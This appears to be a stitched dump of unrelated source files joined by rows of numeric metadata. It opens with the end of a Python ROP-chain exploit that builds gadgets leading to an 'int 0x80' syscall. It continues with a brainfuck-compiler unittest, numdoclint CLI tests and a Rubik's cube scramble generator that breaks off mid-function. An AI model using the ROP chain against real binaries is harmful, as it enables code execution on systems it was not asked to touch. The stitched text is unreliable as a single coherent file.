rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00050360)  # 0x08098360: add eax, 1; ret;
rop += rebase_0(0x00030e70)  # 0x08078e70: int 0x80; ret;
# Trailing newline matches what Python 2's ``print rop`` emitted.
sys.stdout.buffer.write(rop + b'\n')
| 41.690909
| 100
| 0.696904
| 340
| 2,293
| 4.594118
| 0.211765
| 0.143406
| 0.198464
| 0.166453
| 0.739437
| 0.735595
| 0.71895
| 0.71895
| 0.71895
| 0.617798
| 0
| 0.296527
| 0.158744
| 2,293
| 54
| 101
| 42.462963
| 0.513219
| 0.437418
| 0
| 0.708333
| 1
| 0
| 0.007937
| 0
| 0
| 0
| 0.325397
| 0
| 0
| 0
| null | null | 0
| 0.020833
| null | null | 0.020833
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
bc01b710ff377d095ac4e07c8d36db3d4bbe65da
| 3,347
|
py
|
Python
|
t/py2b/operators.py
|
vegitron/python2brainfuck
|
5d6732db19a6f16a21d375b50d39bf80858c3f84
|
[
"Apache-2.0"
] | null | null | null |
t/py2b/operators.py
|
vegitron/python2brainfuck
|
5d6732db19a6f16a21d375b50d39bf80858c3f84
|
[
"Apache-2.0"
] | null | null | null |
t/py2b/operators.py
|
vegitron/python2brainfuck
|
5d6732db19a6f16a21d375b50d39bf80858c3f84
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from p2bf.builder import BFBuild
from p2bf.emitter import Emitter
import StringIO
from util.run_bf import run
class TestOperators(unittest.TestCase):
    """Check ``==``/``!=`` handling in Python compiled to brainfuck."""

    def _compile_and_run(self, source, memory=None):
        # Emit brainfuck for *source*, execute it, and return its stdout.
        emitted = StringIO.StringIO()
        captured = StringIO.StringIO()
        BFBuild(source, emit=Emitter(stdout=emitted)).emit_bf()
        if memory is None:
            run(emitted.getvalue(), stdout=captured)
        else:
            run(emitted.getvalue(), stdout=captured, memory=memory)
        return captured.getvalue()

    def test_equality_true_false(self):
        # True comparison prints cell value 1, false comparison prints 0.
        out = self._compile_and_run("""foo = True == True\nprint foo""", memory=[])
        self.assertEquals(1, ord(out[0]))
        out = self._compile_and_run("""foo = True == False\nprint foo""", memory=[])
        self.assertEquals(0, ord(out[0]))

    def test_equality_statics(self):
        # Static string literals compare by value.
        out = self._compile_and_run("""foo = "a" == "a"\nprint foo""", memory=[])
        self.assertEquals(1, ord(out[0]))
        out = self._compile_and_run("""foo = "a" == "b"\nprint foo""", memory=[])
        self.assertEquals(0, ord(out[0]))

    def test_equality_in_if(self):
        # The branch body runs only when the equality holds.
        out = self._compile_and_run("""if True == True:\n print "OK" """)
        self.assertEquals("OK\n", out)
        out = self._compile_and_run("""if False == True:\n print "OK" """)
        self.assertEquals("", out)

    def test_difference_in_if(self):
        # The branch body runs only when the inequality holds.
        out = self._compile_and_run("""if True != False:\n print "OK" """)
        self.assertEquals("OK\n", out)
        out = self._compile_and_run("""if True != True:\n print "OK" """)
        self.assertEquals("", out)
| 41.8375
| 75
| 0.640275
| 391
| 3,347
| 5.286445
| 0.107417
| 0.11611
| 0.170295
| 0.100629
| 0.898887
| 0.898887
| 0.898887
| 0.898887
| 0.898887
| 0.898887
| 0
| 0.00387
| 0.227965
| 3,347
| 79
| 76
| 42.367089
| 0.796053
| 0
| 0
| 0.742857
| 0
| 0
| 0.076188
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 1
| 0.057143
| false
| 0
| 0.071429
| 0
| 0.142857
| 0.114286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb21ae06fb8342ff2f0507e78727b6accea0d856
| 14,378
|
py
|
Python
|
tests/test_cli.py
|
peterprescott/numdoclint
|
ab9aad01b50c5060373d28bbf5930d2509f2228a
|
[
"MIT"
] | 4
|
2020-01-01T16:10:44.000Z
|
2022-01-06T11:30:12.000Z
|
tests/test_cli.py
|
peterprescott/numdoclint
|
ab9aad01b50c5060373d28bbf5930d2509f2228a
|
[
"MIT"
] | 28
|
2019-06-25T12:05:04.000Z
|
2022-03-25T16:37:05.000Z
|
tests/test_cli.py
|
peterprescott/numdoclint
|
ab9aad01b50c5060373d28bbf5930d2509f2228a
|
[
"MIT"
] | 1
|
2022-03-16T13:09:03.000Z
|
2022-03-16T13:09:03.000Z
|
import os
import shutil
from typing import List
import pytest
import six
from voluptuous import Any, Schema
from numdoclint import cli, jupyter_notebook, py_module
# Scratch package directory recreated by setup() and removed by teardown().
TMP_TEST_MODULE_DIR: str = 'tests/tmp_test/'
# Paths of the two throwaway modules the tests write lint fixtures into.
TMP_TEST_MODULE_PATH_1: str = os.path.join(
    TMP_TEST_MODULE_DIR,
    'tmp_test_1.py')
TMP_TEST_MODULE_PATH_2: str = os.path.join(
    TMP_TEST_MODULE_DIR,
    'tmp_test_2.py')
def setup() -> None:
    """Create a clean, importable temporary test-module directory.

    Executed at the start of the test: any leftovers from a previous run
    are removed first, then an ``__init__.py`` marker makes the directory
    a package.
    """
    shutil.rmtree(TMP_TEST_MODULE_DIR, ignore_errors=True)
    os.makedirs(TMP_TEST_MODULE_DIR)
    marker_path: str = os.path.join(TMP_TEST_MODULE_DIR, '__init__.py')
    with open(marker_path, 'w') as f:
        f.write('\n')
def teardown() -> None:
    """Function to be executed at the end of the test.

    Removes the temporary test-module directory; a missing directory is
    ignored so teardown never fails.
    """
    shutil.rmtree(TMP_TEST_MODULE_DIR, ignore_errors=True)
def test__get_list_of_str_from_csv() -> None:
    """An empty CSV yields [], otherwise values split on commas."""
    assert cli._get_list_of_str_from_csv(csv='') == []
    assert cli._get_list_of_str_from_csv(
        csv='apple,orange') == ['apple', 'orange']
def test__get_list_of_int_from_csv() -> None:
    """An empty CSV yields [], otherwise values parse to integers."""
    assert cli._get_list_of_int_from_csv(csv='') == []
    assert cli._get_list_of_int_from_csv(csv='1,2,3') == [1, 2, 3]
def _assert_default_value_check_info_id_is_in(info_list: List[dict]) -> None:
    """
    Check that the check result of the default value
    is included in the list.

    Parameters
    ----------
    info_list : list of dict
        List of check results.

    Raises
    ------
    AssertionError
        If not included in the list.
    """
    # any() short-circuits on the first match, exactly like the original
    # flag-and-break loop, but without the mutable bookkeeping.
    assert any(
        info_dict[py_module.INFO_KEY_INFO_ID]
        == py_module.INFO_ID_LACKED_DOC_DEFAULT_VALUE
        for info_dict in info_list)
def _assert_default_value_check_info_id_is_not_in(
        info_list: List[dict]) -> None:
    """
    Check that the check result of the default value is not
    included in the list.

    Parameters
    ----------
    info_list : list of dicts
        List of check results.

    Raises
    ------
    AssertionError
        If included in the list.
    """
    # all() replaces the intermediate id list + loop: every reported id
    # must differ from the default-value check id.
    assert all(
        info_dict[py_module.INFO_KEY_INFO_ID]
        != py_module.INFO_ID_LACKED_DOC_DEFAULT_VALUE
        for info_dict in info_list)
def test__validate_args() -> None:
    # A missing path must be rejected.
    with pytest.raises(Exception):  # type: ignore
        cli._validate_args(
            path=None,  # type: ignore
            ignore_info_id_list=[],
            check_recursively=False)
    # An ignore list holding an unknown info id (-1) must be rejected.
    with pytest.raises(Exception):  # type: ignore
        cli._validate_args(
            path='sample/path.py',
            ignore_info_id_list=[-1],
            check_recursively=False)
    # A concrete .py path combined with recursive checking must be rejected.
    with pytest.raises(Exception):  # type: ignore
        cli._validate_args(
            path='sample/path.py',
            ignore_info_id_list=[],
            check_recursively=True)
    # Valid combination: no exception raised.
    cli._validate_args(
        path='sample/path.py',
        ignore_info_id_list=[],
        check_recursively=False)
def test__exec_numdoclint() -> None:
    # --- fixture modules -------------------------------------------------
    # Module 1: a function with no docstring at all.
    module_str_1: str = """
def sample_func_1(price):
    pass
"""
    with open(TMP_TEST_MODULE_PATH_1, 'w') as f:
        f.write(module_str_1)
    # Module 2: decorated function whose docstring omits the default value
    # of ``price`` (only the default-value check should flag it).
    module_str_2: str = '''
@Appender
def sample_func_2(price=100):
    """
    Sample function.

    Parameters
    ----------
    price : bool
        Sample price
    """
    pass
'''
    with open(TMP_TEST_MODULE_PATH_2, 'w') as f:
        f.write(module_str_2)
    # --- single-module checks --------------------------------------------
    info_list: List[dict] = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_PATH_1,
        check_recursively=False,
        is_jupyter=False,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    # Every result row must match the expected module-lint record shape.
    schema: Schema = Schema(
        schema={
            py_module.INFO_KEY_MODULE_PATH: TMP_TEST_MODULE_PATH_1,
            py_module.INFO_KEY_FUNC_NAME: 'sample_func_1',
            py_module.INFO_KEY_INFO_ID: int,
            py_module.INFO_KEY_INFO: Any(*six.string_types),
        },
        required=True)
    for info_dict in info_list:
        schema(info_dict)
    info_id_list: List[int] = [
        info_dict[py_module.INFO_KEY_INFO_ID] for info_dict in info_list]
    # Ignoring by function-name prefix silences everything.
    info_list = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_PATH_1,
        check_recursively=False,
        is_jupyter=False,
        ignore_func_name_prefix_list=['sample_'],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list == []
    # Ignoring every previously reported info id silences everything.
    info_list = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_PATH_1,
        check_recursively=False,
        is_jupyter=False,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=info_id_list,
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list == []
    # Module 2 is only flagged while the default-value check is enabled...
    info_list = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_PATH_2,
        check_recursively=False,
        is_jupyter=False,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list
    # ...so disabling that check reports nothing...
    info_list = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_PATH_2,
        check_recursively=False,
        is_jupyter=False,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=False,
        skip_decorator_name_list=[])
    assert info_list == []
    # ...and so does skipping its decorator.
    info_list = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_PATH_2,
        check_recursively=False,
        is_jupyter=False,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=['Appender'])
    assert info_list == []
    # --- recursive directory checks --------------------------------------
    schema = Schema(
        schema={
            py_module.INFO_KEY_MODULE_PATH: Any(*six.string_types),
            py_module.INFO_KEY_FUNC_NAME: Any(*six.string_types),
            py_module.INFO_KEY_INFO_ID: int,
            py_module.INFO_KEY_INFO: Any(*six.string_types),
        },
        required=True)
    info_list = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_DIR,
        check_recursively=True,
        is_jupyter=False,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list
    for info_dict in info_list:
        schema(info_dict)
    # The recursive run must have visited both fixture modules.
    module_path_list: List[str] = [
        info_dict[py_module.INFO_KEY_MODULE_PATH] for info_dict in info_list]
    module_path_1_exists: bool = False
    module_path_2_exists: bool = False
    for module_path in module_path_list:
        if TMP_TEST_MODULE_PATH_1 in module_path:
            module_path_1_exists = True
            continue
        if TMP_TEST_MODULE_PATH_2 in module_path:
            module_path_2_exists = True
            continue
    assert module_path_1_exists
    assert module_path_2_exists
    info_id_list = [
        info_dict[py_module.INFO_KEY_INFO_ID] for info_dict in info_list]
    # Prefix and info-id filters also apply to the recursive run.
    info_list = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_DIR,
        check_recursively=True,
        is_jupyter=False,
        ignore_func_name_prefix_list=['test_', 'sample_'],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list == []
    info_list = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_DIR,
        check_recursively=True,
        is_jupyter=False,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=info_id_list,
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list == []
    info_list = cli._exec_numdoclint(
        path=TMP_TEST_MODULE_DIR,
        check_recursively=True,
        is_jupyter=False,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=False,
        skip_decorator_name_list=[])
    info_id_list = [
        info_dict[py_module.INFO_KEY_INFO_ID] for info_dict in info_list]
    _assert_default_value_check_info_id_is_not_in(info_list=info_list)
    # --- single-notebook checks ------------------------------------------
    schema = Schema(
        schema={
            jupyter_notebook.INFO_KEY_NOTEBOOK_PATH:
            './tests/jupyter/test_jupyter_notebook_py3.ipynb',
            jupyter_notebook.INFO_KEY_CODE_CELL_INDEX: int,
            jupyter_notebook.INFO_KEY_FUNC_NAME: Any(*six.string_types),
            jupyter_notebook.INFO_KEY_INFO_ID: int,
            jupyter_notebook.INFO_KEY_INFO: Any(*six.string_types),
        },
        required=True)
    info_list = cli._exec_numdoclint(
        path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
        check_recursively=False,
        is_jupyter=True,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list
    for info_dict in info_list:
        schema(info_dict)
    info_id_list = [
        info_dict[jupyter_notebook.INFO_KEY_INFO_ID]
        for info_dict in info_list]
    # The same prefix / info-id filters work for notebooks.
    info_list = cli._exec_numdoclint(
        path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
        check_recursively=False,
        is_jupyter=True,
        ignore_func_name_prefix_list=['sample_', 'test_'],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list == []
    info_list = cli._exec_numdoclint(
        path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
        check_recursively=False,
        is_jupyter=True,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=info_id_list,
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list == []
    info_list = cli._exec_numdoclint(
        path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
        check_recursively=False,
        is_jupyter=True,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    _assert_default_value_check_info_id_is_in(info_list=info_list)
    # Disabling the default-value check drops that info id from the output.
    info_list = cli._exec_numdoclint(
        path='./tests/jupyter/test_jupyter_notebook_py3.ipynb',
        check_recursively=False,
        is_jupyter=True,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=False,
        skip_decorator_name_list=[])
    for info_dict in info_list:
        assert (
            info_dict[jupyter_notebook.INFO_KEY_INFO_ID]
            != py_module.INFO_ID_LACKED_DOC_DEFAULT_VALUE)
    # --- recursive notebook-directory checks -----------------------------
    info_list = cli._exec_numdoclint(
        path='./tests/jupyter/',
        check_recursively=True,
        is_jupyter=True,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    schema = Schema(
        schema={
            jupyter_notebook.INFO_KEY_NOTEBOOK_PATH: Any(*six.string_types),
            jupyter_notebook.INFO_KEY_CODE_CELL_INDEX: int,
            jupyter_notebook.INFO_KEY_FUNC_NAME: Any(*six.string_types),
            jupyter_notebook.INFO_KEY_INFO_ID: int,
            jupyter_notebook.INFO_KEY_INFO: Any(*six.string_types),
        },
        required=True)
    assert info_list
    for info_dict in info_list:
        schema(info_dict)
    # More than one notebook must have been visited by the recursive run.
    unique_notebook_path_list = [
        info_dict[jupyter_notebook.INFO_KEY_NOTEBOOK_PATH]
        for info_dict in info_list]
    unique_notebook_path_list = list(set(unique_notebook_path_list))
    assert len(unique_notebook_path_list) > 1
    _assert_default_value_check_info_id_is_in(info_list=info_list)
    info_id_list = [
        info_dict[jupyter_notebook.INFO_KEY_INFO_ID]
        for info_dict in info_list]
    info_list = cli._exec_numdoclint(
        path='./tests/jupyter/',
        check_recursively=True,
        is_jupyter=True,
        ignore_func_name_prefix_list=['test_', 'sample_'],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list == []
    info_list = cli._exec_numdoclint(
        path='./tests/jupyter/',
        check_recursively=True,
        is_jupyter=True,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=info_id_list,
        enable_default_or_optional_doc_check=True,
        skip_decorator_name_list=[])
    assert info_list == []
    info_list = cli._exec_numdoclint(
        path='./tests/jupyter/',
        check_recursively=True,
        is_jupyter=True,
        ignore_func_name_prefix_list=[],
        ignore_info_id_list=[],
        enable_default_or_optional_doc_check=False,
        skip_decorator_name_list=[])
    _assert_default_value_check_info_id_is_not_in(info_list=info_list)
def test_main() -> None:
    # Fixture module: a function with no docstring, so main() must report
    # at least one lint record for it.
    module_str_1: str = """
def sample_func_1(price):
    pass
"""
    with open(TMP_TEST_MODULE_PATH_1, 'w') as f:
        f.write(module_str_1)

    # Stand-in for the argparse namespace main() normally receives.
    class Args:
        path: str = TMP_TEST_MODULE_PATH_1
        check_recursively: bool = False
        is_jupyter: bool = False
        ignore_func_name_prefix_list: List[str] = []
        ignore_info_id_list: List[int] = []
        enable_default_or_optional_doc_check: bool = True
        skip_decorator_name_list: List[str] = []
    args: Args = Args()
    info_list: List[dict] = cli.main(
        args=args,  # type: ignore
        return_list=True)
    assert info_list
    # Every returned record must match the module-lint record shape.
    schema: Schema = Schema(
        schema={
            py_module.INFO_KEY_MODULE_PATH: TMP_TEST_MODULE_PATH_1,
            py_module.INFO_KEY_FUNC_NAME: 'sample_func_1',
            py_module.INFO_KEY_INFO_ID: int,
            py_module.INFO_KEY_INFO: Any(*six.string_types),
        },
        required=True)
    for info_dict in info_list:
        schema(info_dict)
| 33.751174
| 77
| 0.670538
| 1,936
| 14,378
| 4.472107
| 0.0625
| 0.057288
| 0.040425
| 0.044352
| 0.883114
| 0.852044
| 0.826403
| 0.789097
| 0.757103
| 0.742666
| 0
| 0.004765
| 0.240924
| 14,378
| 425
| 78
| 33.830588
| 0.788529
| 0.041591
| 0
| 0.733516
| 0
| 0
| 0.057894
| 0.025543
| 0
| 0
| 0
| 0
| 0.085165
| 1
| 0.024725
| false
| 0.008242
| 0.019231
| 0
| 0.065934
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb7a9de0b9b2a2419581255afd1cac913ec3dbbd
| 34,478
|
py
|
Python
|
pycubescrambler/nxn.py
|
cuberxmidnight/pycubescrambler
|
603f335a5ef9b50b3eb2847b5fe7f6f6f63b2f7a
|
[
"MIT"
] | null | null | null |
pycubescrambler/nxn.py
|
cuberxmidnight/pycubescrambler
|
603f335a5ef9b50b3eb2847b5fe7f6f6f63b2f7a
|
[
"MIT"
] | null | null | null |
pycubescrambler/nxn.py
|
cuberxmidnight/pycubescrambler
|
603f335a5ef9b50b3eb2847b5fe7f6f6f63b2f7a
|
[
"MIT"
] | null | null | null |
import random
def get_fmc():
    """Return an FMC (Fewest Moves Challenge) scramble string.

    A raw 20-move 3x3x3 scramble is generated, trimmed so that it cannot
    cancel into the mandatory leading/trailing "R' U' F", then wrapped in
    that prefix and suffix (WCA FMC scramble format).
    """

    def main_scram():
        """Build one raw 20-move scramble (alternating move + suffix)."""
        moves = ["F", "B", "R", "L", "U", "D"]
        # "2 " appears twice on purpose: double turns get twice the weight.
        turns = [" ", "2 ", "' ", "2 "]
        scramble = []
        usedmoves = []
        usedmoves1 = []
        for i in range(20):
            if i % 2 == 0:
                randmoves = random.choice(moves)
                if i == 0:
                    # Never start with F: it would merge with the F of the
                    # "R' U' F" prefix added by the caller.
                    while randmoves == "F":
                        randmoves = random.choice(moves)
                elif i > 1:
                    # Re-roll A X A' patterns on the same axis (e.g. F..B..F).
                    while randmoves == "F" and scramble[-4] == "F" and scramble[-2] == "B":
                        randmoves = random.choice(moves)
                    while randmoves == "B" and scramble[-4] == "B" and scramble[-2] == "F":
                        randmoves = random.choice(moves)
                    while randmoves == "R" and scramble[-4] == "R" and scramble[-2] == "L":
                        randmoves = random.choice(moves)
                    while randmoves == "L" and scramble[-4] == "L" and scramble[-2] == "R":
                        randmoves = random.choice(moves)
                    while randmoves == "U" and scramble[-4] == "U" and scramble[-2] == "D":
                        randmoves = random.choice(moves)
                    while randmoves == "D" and scramble[-4] == "D" and scramble[-2] == "U":
                        randmoves = random.choice(moves)
                usedmoves.append(randmoves)
                scramble.append(randmoves)
                scramble.append(random.choice(turns))
                # Exclude the move just used from the next draw; restore the
                # move used two steps earlier.
                moves.remove(randmoves)
                if i != 0:
                    moves.append(usedmoves1[-1])
            else:
                randmoves1 = random.choice(moves)
                if i == 1:
                    while scramble[-2] == "B" and randmoves1 == "F":
                        randmoves1 = random.choice(moves)
                elif i > 1:
                    while randmoves1 == "F" and scramble[-4] == "F" and scramble[-2] == "B":
                        randmoves1 = random.choice(moves)
                    # BUGFIX: this loop previously tested ``randmoves`` (the
                    # even-step variable) instead of ``randmoves1``.
                    while randmoves1 == "B" and scramble[-4] == "B" and scramble[-2] == "F":
                        randmoves1 = random.choice(moves)
                    while randmoves1 == "R" and scramble[-4] == "R" and scramble[-2] == "L":
                        randmoves1 = random.choice(moves)
                    while randmoves1 == "L" and scramble[-4] == "L" and scramble[-2] == "R":
                        randmoves1 = random.choice(moves)
                    while randmoves1 == "U" and scramble[-4] == "U" and scramble[-2] == "D":
                        randmoves1 = random.choice(moves)
                    while randmoves1 == "D" and scramble[-4] == "D" and scramble[-2] == "U":
                        randmoves1 = random.choice(moves)
                scramble.append(randmoves1)
                usedmoves1.append(randmoves1)
                scramble.append(random.choice(turns))
                moves.remove(randmoves1)
                moves.append(usedmoves[-1])
        return "".join(scramble)

    a = main_scram().split()
    # Moves that could cancel with the leading "R' U' F" ...
    list1 = ["F", "F2", "F'", "B'", "B2", "B"]
    # ... and with the trailing "R' U' F".
    list2 = ["R2", "R", "R'", "L", "L'", "L2"]
    list3 = ["F", "F2", "F'"]
    list4 = ["R2", "R", "R'"]
    times = 0
    # Trim the offending end moves; after more than 3 trims, give up and
    # regenerate a fresh scramble instead.
    while (a[0] in list1 and a[1] in list1) or (a[0] in list3) or (a[-1] in list2 and a[-2] in list2) or (a[-1] in list4):
        if times > 3:
            # BUGFIX: was ``main_scram.split()`` (missing call parentheses),
            # which raised AttributeError on the function object.
            a = main_scram().split()
            times = 0
        if a[0] in list3:
            a.remove(a[0])
            times += 1
        if a[0] in list1 and a[1] in list1:
            if a[0] not in list3:
                a.remove(a[1])
                times += 1
        if a[-1] in list4:
            a.remove(a[-1])
            times += 1
        if a[-1] in list2 and a[-2] in list2:
            if a[-1] not in list4:
                a.remove(a[-2])
                times += 1
    scramble = "R' U' F " + " ".join(a) + " R' U' F"
    return scramble
def get1():
    """Return an 8-move rotation-only scramble built from x/y/z turns."""
    axis_pool = ["x", "y", "z"]
    suffixes = [" ", "2 ", "' "]
    parts = []
    even_history = []
    odd_history = []
    for step in range(8):
        picked = random.choice(axis_pool)
        parts.append(picked)
        parts.append(random.choice(suffixes))
        # Keep the move just used out of the next draw, and restore the
        # move used two steps earlier.
        axis_pool.remove(picked)
        if step % 2 == 0:
            even_history.append(picked)
            if step != 0:
                axis_pool.append(odd_history[-1])
        else:
            odd_history.append(picked)
            axis_pool.append(even_history[-1])
    return "".join(parts)
def get2():
    """Return a 10-move 2x2x2 scramble using only the F, R and U faces."""
    face_pool = ["F", "R", "U"]
    # "2 " is listed twice so double turns are drawn more often.
    suffixes = [" ", "2 ", "' ", "2 "]
    parts = []
    even_history = []
    odd_history = []
    for step in range(10):
        face = random.choice(face_pool)
        parts.append(face)
        parts.append(random.choice(suffixes))
        # Exclude the face just turned from the next draw; re-admit the
        # face turned two steps ago.
        face_pool.remove(face)
        if step % 2 == 0:
            even_history.append(face)
            if step != 0:
                face_pool.append(odd_history[-1])
        else:
            odd_history.append(face)
            face_pool.append(even_history[-1])
    return "".join(parts)
def get3():
    """Return a 20-move 3x3x3 scramble.

    The first few even-indexed moves favour double turns; sequences that
    partially cancel on one axis (e.g. F .. B .. F) are re-rolled.
    """
    moves = ["F", "B", "R", "L", "U", "D"]
    # "2 " appears twice on purpose: double turns get twice the weight.
    turns = [" ", "2 ", "' ", "2 "]
    scramble = []
    usedmoves = []
    usedmoves1 = []
    for i in range(20):
        if i % 2 == 0:
            randmoves = random.choice(moves)
            if i > 1:
                # Re-roll A X A' patterns on the same axis.
                while randmoves == "F" and scramble[-4] == "F" and scramble[-2] == "B":
                    randmoves = random.choice(moves)
                while randmoves == "B" and scramble[-4] == "B" and scramble[-2] == "F":
                    randmoves = random.choice(moves)
                while randmoves == "R" and scramble[-4] == "R" and scramble[-2] == "L":
                    randmoves = random.choice(moves)
                while randmoves == "L" and scramble[-4] == "L" and scramble[-2] == "R":
                    randmoves = random.choice(moves)
                while randmoves == "U" and scramble[-4] == "U" and scramble[-2] == "D":
                    randmoves = random.choice(moves)
                while randmoves == "D" and scramble[-4] == "D" and scramble[-2] == "U":
                    randmoves = random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            if i <= 4:
                # Early moves: force a double turn 2 times out of 3.
                ok = random.randint(1, 3)
                if ok != 1:
                    scramble.append("2 ")
                else:
                    scramble.append(random.choice(turns))
            else:
                scramble.append(random.choice(turns))
            # Exclude the move just used from the next draw; restore the
            # move used two steps earlier.
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1 = random.choice(moves)
            if i > 1:
                while randmoves1 == "F" and scramble[-4] == "F" and scramble[-2] == "B":
                    randmoves1 = random.choice(moves)
                # BUGFIX: this loop previously tested ``randmoves`` (the
                # even-step variable) instead of ``randmoves1``.
                while randmoves1 == "B" and scramble[-4] == "B" and scramble[-2] == "F":
                    randmoves1 = random.choice(moves)
                while randmoves1 == "R" and scramble[-4] == "R" and scramble[-2] == "L":
                    randmoves1 = random.choice(moves)
                while randmoves1 == "L" and scramble[-4] == "L" and scramble[-2] == "R":
                    randmoves1 = random.choice(moves)
                while randmoves1 == "U" and scramble[-4] == "U" and scramble[-2] == "D":
                    randmoves1 = random.choice(moves)
                while randmoves1 == "D" and scramble[-4] == "D" and scramble[-2] == "U":
                    randmoves1 = random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    return "".join(scramble)
def get4():
    """Return a 4x4x4 scramble.

    Phase 1 generates 20 outer-face moves (same scheme as ``get3``);
    phase 2 appends 25 moves that may also use wide turns (Fw/Rw/Uw).
    """
    moves = ["F", "B", "R", "L", "U", "D"]
    wide_turns = ["F", "Fw", "B", "R", "Rw", "L", "D", "U", "Uw"]
    # "2 " appears twice on purpose: double turns get twice the weight.
    turns = [" ", "2 ", "' ", "2 "]
    scramble = []
    usedmoves = []
    usedmoves1 = []
    # Axis groups: moves in one list turn around the same cube axis.
    list1 = ["F", "B", "Fw"]
    list2 = ["R", "L", "Rw"]
    list3 = ["D", "U", "Uw"]
    # ---- phase 1: 20 outer-face moves ----
    for i in range(20):
        if i % 2 == 0:
            randmoves = random.choice(moves)
            if i > 1:
                # Re-roll A X A' patterns on the same axis.
                while randmoves == "F" and scramble[-4] == "F" and scramble[-2] == "B":
                    randmoves = random.choice(moves)
                while randmoves == "B" and scramble[-4] == "B" and scramble[-2] == "F":
                    randmoves = random.choice(moves)
                while randmoves == "R" and scramble[-4] == "R" and scramble[-2] == "L":
                    randmoves = random.choice(moves)
                while randmoves == "L" and scramble[-4] == "L" and scramble[-2] == "R":
                    randmoves = random.choice(moves)
                while randmoves == "U" and scramble[-4] == "U" and scramble[-2] == "D":
                    randmoves = random.choice(moves)
                while randmoves == "D" and scramble[-4] == "D" and scramble[-2] == "U":
                    randmoves = random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            if i <= 4:
                # Early moves: force a double turn 2 times out of 3.
                ok = random.randint(1, 3)
                if ok != 1:
                    scramble.append("2 ")
                else:
                    scramble.append(random.choice(turns))
            else:
                scramble.append(random.choice(turns))
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1 = random.choice(moves)
            if i > 1:
                while randmoves1 == "F" and scramble[-4] == "F" and scramble[-2] == "B":
